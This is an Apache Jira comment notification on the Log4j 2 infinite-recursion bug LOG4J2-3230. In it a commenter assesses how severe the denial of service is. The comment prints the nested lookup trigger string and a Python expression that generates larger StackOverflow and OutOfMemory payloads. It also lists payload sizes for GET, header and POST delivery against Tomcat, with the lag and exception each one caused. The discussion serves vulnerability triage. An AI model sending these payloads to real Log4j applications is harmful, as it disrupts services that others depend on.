[
https://issues.apache.org/jira/browse/LOG4J2-3230?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17461971#comment-17461971
]
AP commented on LOG4J2-3230:
----------------------------
I concur with [~harmeetbedi] and [~mfriedenhagen] -
I don't see any "high" real world implication of this DoS either (Denial Of
Service) - Yes, It can lead to Exceptions, could be used to perform log evasion
or even cause very minor lags but they are not substantial enough to kill/exit
the execution of the app completely and the attack complexity of successful
exploitation is High.
Let's assume we are using an application utilizing LOG4J 2.14 (For the sake of
simplicity on exploit delivery) on Tomcat Server for an example:
The exploit in this thread
{code:java}
${${::-${::-$${::-j}}}} {code}
will invoke the IllegalStateException exception with no lags/delays.
I was able to come up with a new payload to perform StackOverflow Exception but
doesn't crash the app to kill it or to disrupt it to the extent that it quits.
Put this in python interpreter to get the payload to see it work
{code:java}
"${" + "${::-"*1200 + "$${::-j}" + "}"*1200 + "}" {code}
I tested three real world scenarios
*1.) Payload delivered via GET (It has size restriction of 2048 bytes usually)*
{code:java}
"${" + "${::-"*300 + "$${::-j}" + "}"*300 + "}" {code}
Outcome: No Lags, No Exception, App continues normally.
*2.) Payload delivered via Header (Tomcat max size 8k - 48k):*
{code:java}
"${" + "${::-"*8000 + "$${::-j}" + "}"*8000 + "}"{code}
Outcome: 1 second Lag, StackOverflow exception, App continues normally.
*3.) Payload delivered via POST (Tomcat default 2MB)*
{code:java}
"${" + "${::-"*500000 + "$${::-j}" + "}"*500000 + "}" {code}
Outcome: 18 sec lag, java.lang.OutOfMemoryError exception, App continues
normally.
Tested on OS X with 16 GB RAM. We are not even considering a high-end server in
this case. Also, this tests are assumed for 2.14 where payloads are delivered
easily, but on 2.15 onwards there are lot more "ifs" for an exploitation to be
successful. (Context, %m\{lookups}, etc.). So, the attack complexity (AC) for a
successful and disruptive crash tends to be high.
I would be however interested to see if any real-world apps get fully
crashed/exits/killed due to this DoS on default log4j 2.14 onwards usage.
> Certain strings can cause infinite recursion
> --------------------------------------------
>
> Key: LOG4J2-3230
> URL: https://issues.apache.org/jira/browse/LOG4J2-3230
> Project: Log4j 2
> Issue Type: Bug
> Components: Core
> Affects Versions: 2.8, 2.8.1, 2.8.2, 2.9.0, 2.9.1, 2.10.0, 2.11.0, 2.11.1,
> 2.11.2, 2.12.0, 2.12.1, 2.13.0, 2.13.1, 2.13.2, 2.14.0, 2.13.3, 2.14.1,
> 2.15.0, 2.16.0
> Reporter: Ross Cohen
> Assignee: Carter Kozak
> Priority: Major
> Fix For: 2.17.0
>
> Attachments: sample.tar.gz
>
>
> If a string substitution is attempted for any reason on the following string,
> it will trigger an infinite recursion, and the application will crash:
> ${${::\-${::\-$${::\-j}}}}.
--
This message was sent by Atlassian Jira
(v8.20.1#820001)
